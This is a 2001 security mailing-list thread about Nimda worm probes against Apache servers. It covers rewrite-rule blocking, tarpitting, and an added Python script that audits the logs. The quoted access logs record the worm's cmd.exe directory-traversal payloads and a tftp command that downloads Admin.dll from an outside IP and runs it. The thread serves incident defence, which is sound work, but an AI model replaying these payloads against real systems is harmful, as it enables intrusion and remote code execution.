Security Incidents mailing list archives
RE: Nimda Apache RedirectMatch results
From: "David Leitko" <dvd () gotblues com>
Date: Wed, 19 Sep 2001 16:31:53 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm not having that experience.. I've thrown the following into my httpd.conf: (Server version: Apache/1.3.14)

# bounce nimda
RedirectMatch 415 (.*)\.exe(.*)$

and I still only get 16 probes per host. However, three of the probes don't return with 415 for some reason... same three probes on every "attack".. two return 400's and one returns 404... thoughts?

xx - - [19/Sep/2001:16:13:46 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:48 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:55 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:49 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:52 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:03 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
xx - - [19/Sep/2001:16:15:12 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:19 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:21 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:25 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:26 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:29 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316

- -- 
David Leitko
dvd () leitko net
http://www.leitko.net
PGP Fingerprint 9B5B 8853 2AA9 4546 211C 21DC 7D98 A825 8C88 0862

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO6kqk32YqCWMiAhiEQLPAQCg+Dcb17ClDmyhVIvR0duh1yEIssgAoNCS
UUvRPcjiX9husckmZ3ErAU27
=0z4A
-----END PGP SIGNATURE-----
-----Original Message-----
From: Michael Halls [mailto:mhalls () nielsen net]
Sent: Wednesday, September 19, 2001 1:21 PM
To: George Milliken
Cc: Incidents () Securityfocus Com
Subject: RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update

On Wed, 19 Sep 2001, George Milliken wrote:

> Maybe something like a rewrite rule
>
> RewriteEngine On
> RewriteRule ^.*/cmd.exe.* - [F,L]
> RewriteRule ^.*/root.exe.* - [F,L]
>
> This will send "forbidden" to systems trying those URLs and will stop
> rewrite processing.

Actually this may increase the load to those servers. When the worm's probe receives anything other than a 404 (not found) it makes several other requests to the server to exploit the machines. It first tries to copy the Admin.dll to the c:, d:, and e: drives:

216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 51 "-" "-"

The worm then attempts to execute the Admin.dll:

216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-"

This has the effect of increasing the traffic about 5 fold. The worm also will continue to probe/exploit the machine after it gets a "hit", so a machine that returns 403 (forbidden) for each of the 16 attacks would get about 80 hits to their website from each machine.

Playing around with some cgi scripts that tarpit requests, it looks like the worm's tcp connections time out after 1 minute 30 seconds without a response. By sleeping my script for about 1 minute 15 seconds I can hold a machine in my "tarpit" for about an hour and a half. Does anybody know if this thing is single threaded?
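Added example (not part of the thread, and not code from either poster): a small Python audit that re-reads the 16 probe lines David posted, checks each one against his RedirectMatch rule, and explains the three that did not come back as 415. The explanation it models is Apache 1.3's URL unescaping step, which runs before mod_alias sees the request: a malformed %-escape (the two "%%35" probes) is rejected with 400, and a %2F that decodes to a slash (the "%c0%2f" probe) with 404, so the RedirectMatch rule never gets a chance to fire on those. The log-format regex, the unescape emulation and the function names are this example's own assumptions, not anything from the original posts.

```python
"""Audit Apache access-log lines against a RedirectMatch rule.

Added example, not from the original thread.  The unescape_path()
function is this example's own model of Apache 1.3's ap_unescape_url(),
which rejects a malformed %-escape with 400 and a %-escape that decodes
to '/' or NUL with 404, both before the RedirectMatch rule is evaluated.
"""
import re

# Constructed input: the sixteen probe lines quoted in David's post
# (host anonymised to "xx" exactly as in the original).
LOG_LINES = """\
xx - - [19/Sep/2001:16:13:46 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:48 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:13:55 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:49 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:14:52 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:03 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
xx - - [19/Sep/2001:16:15:12 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:19 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:21 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:25 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
xx - - [19/Sep/2001:16:15:26 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
xx - - [19/Sep/2001:16:15:29 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316
""".splitlines()

# Common/combined log format: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<protocol>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The rule from David's httpd.conf:  RedirectMatch 415 (.*)\.exe(.*)$
EXE_RULE = re.compile(r'(.*)\.exe(.*)$')
HEX_DIGITS = "0123456789abcdefABCDEF"


def parse_log_line(line):
    """Split one access-log line into its fields; status becomes an int."""
    match = LOG_RE.match(line)
    if match is None:
        raise ValueError("unrecognised log line: %r" % line)
    record = match.groupdict()
    record["status"] = int(record["status"])
    return record


def unescape_path(path):
    """Emulate Apache 1.3 ap_unescape_url() on the URI path (query excluded).

    Returns (error_status, decoded_path): error_status is 400 for a bad
    %-escape, 404 when any escape decodes to '/' or NUL, else None.
    Assumption of this example: a bad escape outranks a bad path, as in
    the original C code.
    """
    out, bad_escape, bad_path, i = [], False, False, 0
    while i < len(path):
        if path[i] != "%":
            out.append(path[i])
            i += 1
            continue
        pair = path[i + 1:i + 3]
        if len(pair) == 2 and all(c in HEX_DIGITS for c in pair):
            decoded = chr(int(pair, 16))
            if decoded in ("/", "\0"):
                bad_path = True
            out.append(decoded)
            i += 3
        else:
            bad_escape = True      # keep the literal '%' and move on
            out.append("%")
            i += 1
    if bad_escape:
        return 400, "".join(out)
    if bad_path:
        return 404, "".join(out)
    return None, "".join(out)


def predict_status(target):
    """Status the server should produce for a request target under the rule."""
    path = target.split("?", 1)[0]          # only the path is unescaped
    error, decoded = unescape_path(path)
    if error is not None:
        return error                          # rejected before RedirectMatch
    if EXE_RULE.search(decoded):
        return 415                            # caught by the RedirectMatch rule
    return None                               # would fall through to normal handling


def audit(lines):
    """Parse each line, attach the predicted status and whether the rule hit."""
    rows = []
    for line in lines:
        record = parse_log_line(line)
        record["predicted"] = predict_status(record["target"])
        record["rule_hit"] = record["status"] == 415
        rows.append(record)
    return rows


def summarize(rows):
    """Count observed status codes, e.g. {415: 13, 404: 1, 400: 2}."""
    counts = {}
    for row in rows:
        counts[row["status"]] = counts.get(row["status"], 0) + 1
    return counts


if __name__ == "__main__":
    audited = audit(LOG_LINES)
    print("status counts:", summarize(audited))
    for row in audited:
        if not row["rule_hit"]:
            print("rule missed %s -> observed %d, model predicts %s"
                  % (row["target"], row["status"], row["predicted"]))
```

Run against the lines above the model agrees with every observed status, which is the practical check: the three "misses" are not a gap in the regex but requests Apache refused before the rule ran, so they never reach a handler either way.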
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update George Milliken (Sep 19)
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update Michael Halls (Sep 19)
- RE: Nimda Apache RedirectMatch results David Leitko (Sep 19)
- RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update Michael Halls (Sep 19)